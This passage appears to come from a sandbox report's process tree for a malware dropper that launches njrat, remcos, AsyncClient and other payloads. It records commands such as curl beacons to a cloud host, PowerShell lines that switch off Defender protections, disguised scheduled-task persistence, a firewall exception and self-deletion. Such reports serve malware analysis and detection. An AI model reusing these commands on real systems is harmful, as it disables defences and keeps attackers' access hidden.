        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:3780
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:5048
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:6076
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:2140
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:5140
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:1476
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:4944
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:228
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:4688
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:5888
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:5496
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:2288
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:3856
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:960
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:2672
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:536
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:3152
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:4188
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:5248
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:4604
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:1504
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:2252
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:1524
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:4240
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:2412
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:4188
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:1892
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:2036
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:6048
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:3720
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:2780
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:4060
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:1476
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:5200
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:4352
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:3580
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:1636
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:3744
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:4544
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:1812
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:3768
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:5752
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio""
        5⤵
        
        PID:3140
      - C:\Windows\system32\curl.exe
        
        curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=Aoyvszio"
        6⤵
        
        PID:5312
- - C:\Users\Admin\AppData\Local\Temp\Files\nc64.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\nc64.exe"
    3⤵
    - Executes dropped EXE
    PID:1996
- - C:\Users\Admin\AppData\Local\Temp\Files\GOLD.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\GOLD.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1536
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5488
- - C:\Users\Admin\AppData\Local\Temp\Files\c3.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\c3.exe"
    3⤵
    - Executes dropped EXE
    PID:1764
- - C:\Users\Admin\AppData\Local\Temp\Files\5gevcp8z.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\5gevcp8z.exe"
    3⤵
    - Executes dropped EXE
    PID:2516
  - - C:\Users\Admin\AppData\Local\Temp\is-DHUEV.tmp\5gevcp8z.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-DHUEV.tmp\5gevcp8z.tmp" /SL5="$3020C,1707145,795136,C:\Users\Admin\AppData\Local\Temp\Files\5gevcp8z.exe"
      4⤵
      Executes dropped EXE
      PID:5896
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C timeout /T 3 & "C:\Users\Admin\AppData\Local\Temp\Files\5gevcp8z.exe" /VERYSILENT /SUPPRESSMSGBOXES
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4412
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 3
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:696
      - C:\Users\Admin\AppData\Local\Temp\Files\5gevcp8z.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\5gevcp8z.exe" /VERYSILENT /SUPPRESSMSGBOXES
        6⤵
        Executes dropped EXE
        
        PID:3348
        
        C:\Users\Admin\AppData\Local\Temp\is-2CAC0.tmp\5gevcp8z.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-2CAC0.tmp\5gevcp8z.tmp" /SL5="$50046,1707145,795136,C:\Users\Admin\AppData\Local\Temp\Files\5gevcp8z.exe" /VERYSILENT /SUPPRESSMSGBOXES
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:3412
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "regsvr32.exe" /s /i:INSTALL C:\Users\Admin\AppData\Roaming\\StoutCoyote.dll
        8⤵
        
        PID:1112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\StoutCoyote.dll' }) { exit 0 } else { exit 1 }"
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3360
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\Admin\AppData\Roaming\StoutCoyote.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{57394A73-96D9-4CC4-C9F4-F0E75893337D}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3744
        
        C:\Users\Admin\AppData\Local\Temp\79bf8674ec\Gxtuum.exe
        
        "C:\Users\Admin\AppData\Local\Temp\79bf8674ec\Gxtuum.exe"
        9⤵
        Executes dropped EXE
        
        PID:5908
- - C:\Users\Admin\AppData\Local\Temp\Files\filer.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\filer.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3840
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\Files\filer.exe
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5152
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:872
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:5552
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic os get Caption
      4⤵
      PID:4192
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic cpu get Name
      4⤵
      PID:4548
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1244
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5692
- - C:\Users\Admin\AppData\Local\Temp\Files\WinRarInstall.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\WinRarInstall.exe"
    3⤵
    - Executes dropped EXE
    PID:4916
  - - C:\Users\Admin\AppData\Local\Temp\winrar-info.exe
      "C:\Users\Admin\AppData\Local\Temp\winrar-info.exe"
      4⤵
      Executes dropped EXE
      PID:6032
  - - C:\Users\Admin\AppData\Local\Temp\winrar-x64-701ru.exe
      "C:\Users\Admin\AppData\Local\Temp\winrar-x64-701ru.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:404
- - C:\Users\Admin\AppData\Local\Temp\Files\njrat.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\njrat.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:3136
  - - C:\Windows\rundll32.exe
      "C:\Windows\rundll32.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Drops autorun.inf file
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: GetForegroundWindowSpam
      PID:124
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Windows\rundll32.exe" "rundll32.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3400
- - C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:908
  - - C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"
      4⤵
      Executes dropped EXE
      PID:2288
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 908 -s 276
      4⤵
      Program crash
      PID:2780
- - C:\Users\Admin\AppData\Local\Temp\Files\ExtremeInjector.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ExtremeInjector.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:3696
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
      4⤵
      PID:3876
- - C:\Users\Admin\AppData\Local\Temp\Files\surfex.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\surfex.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:3128
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:1964
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4416
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:1840
- - C:\Users\Admin\AppData\Local\Temp\Files\newfile.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\newfile.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:4016
- - C:\Users\Admin\AppData\Local\Temp\Files\file.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\file.exe"
    3⤵
    - Adds policy Run key to start application
    - Executes dropped EXE
    - Adds Run key to start application
    - Modifies registry class
    PID:4004
  - - C:\ProgramData\tst\remcos.exe
      "C:\ProgramData\tst\remcos.exe"
      4⤵
      Adds policy Run key to start application
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      PID:2244
    - - \??\c:\program files (x86)\internet explorer\iexplore.exe
        
        "c:\program files (x86)\internet explorer\iexplore.exe"
        5⤵
        
        PID:1856
- - C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2528
- - C:\Users\Admin\AppData\Local\Temp\Files\coreplugin.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\coreplugin.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2404
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k move Anytime Anytime.cmd & Anytime.cmd & exit
      4⤵
      PID:1052
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:4032
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        5⤵
        
        PID:5136
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:1920
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1300
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 297145
        5⤵
        
        PID:5580
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "CorkBkConditionsMoon" Scary
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2500
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Dependence + ..\Nsw + ..\Developmental + ..\Shared + ..\Ranges + ..\Notify + ..\Pending + ..\Previously k
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4108
    - - C:\Users\Admin\AppData\Local\Temp\297145\Cultures.pif
        
        Cultures.pif k
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Suspicious use of SetThreadContext
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5244
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        
        PID:1540
- - C:\Users\Admin\AppData\Local\Temp\Files\pp.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"
    3⤵
    PID:3136
  - - C:\Users\Admin\AppData\Local\Temp\1937516595.exe
      C:\Users\Admin\AppData\Local\Temp\1937516595.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:1876
- - C:\Users\Admin\AppData\Local\Temp\Files\06082025.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\06082025.exe"
    3⤵
    PID:5300
- - C:\Users\Admin\AppData\Local\Temp\Files\skuld3.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\skuld3.exe"
    3⤵
    - Adds Run key to start application
    PID:568
  - - C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Local\Temp\Files\skuld3.exe
      4⤵
      Views/modifies file attributes
      PID:4908
- - C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe"
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:4916
  - - C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
      "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
      4⤵
      PID:1100
    - - C:\Users\Admin\AppData\Local\Temp\10000270101\Javvvum.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000270101\Javvvum.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5580
    - - C:\Users\Admin\AppData\Local\Temp\10000281101\stail.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000281101\stail.exe"
        5⤵
        
        PID:4664
      - C:\Users\Admin\AppData\Local\Temp\is-GULAH.tmp\stail.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-GULAH.tmp\stail.tmp" /SL5="$D02D8,3881966,54272,C:\Users\Admin\AppData\Local\Temp\10000281101\stail.exe"
        6⤵
        Suspicious use of FindShellTrayWindow
        
        PID:5068
        
        C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" pause lerry_video_11261
        7⤵
        
        PID:5248
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 pause lerry_video_11261
        8⤵
        
        PID:6032
        
        C:\Users\Admin\AppData\Local\Lerry Video 22.0.1000\lerryvideo.exe
        
        "C:\Users\Admin\AppData\Local\Lerry Video 22.0.1000\lerryvideo.exe" -i
        7⤵
        
        PID:3028
- - C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4272
  - - C:\Users\Admin\AppData\Local\Temp\2389613217.exe
      C:\Users\Admin\AppData\Local\Temp\2389613217.exe
      4⤵
      PID:3348
- - C:\Users\Admin\AppData\Local\Temp\Files\ControlledAccessPoint.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ControlledAccessPoint.exe"
    3⤵
    - Suspicious use of SetThreadContext
    PID:6104
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      PID:1208
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      PID:592
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" & rd /s /q "C:\ProgramData\JJKEBGHJKFID" & exit
        5⤵
        
        PID:4688
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        6⤵
        Delays execution with timeout.exe
        
        PID:4572
- - C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
    3⤵
    PID:880
- - C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe"
    3⤵
    PID:816
- - C:\Users\Admin\AppData\Local\Temp\Files\opengl32.dll40watson-sanchez4040830.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\opengl32.dll40watson-sanchez4040830.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1072
- - C:\Users\Admin\AppData\Local\Temp\Files\spofrln.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\spofrln.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:4412
- - C:\Users\Admin\AppData\Local\Temp\Files\Microsoft.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Microsoft.exe"
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: GetForegroundWindowSpam
    PID:760
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:1948
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5368
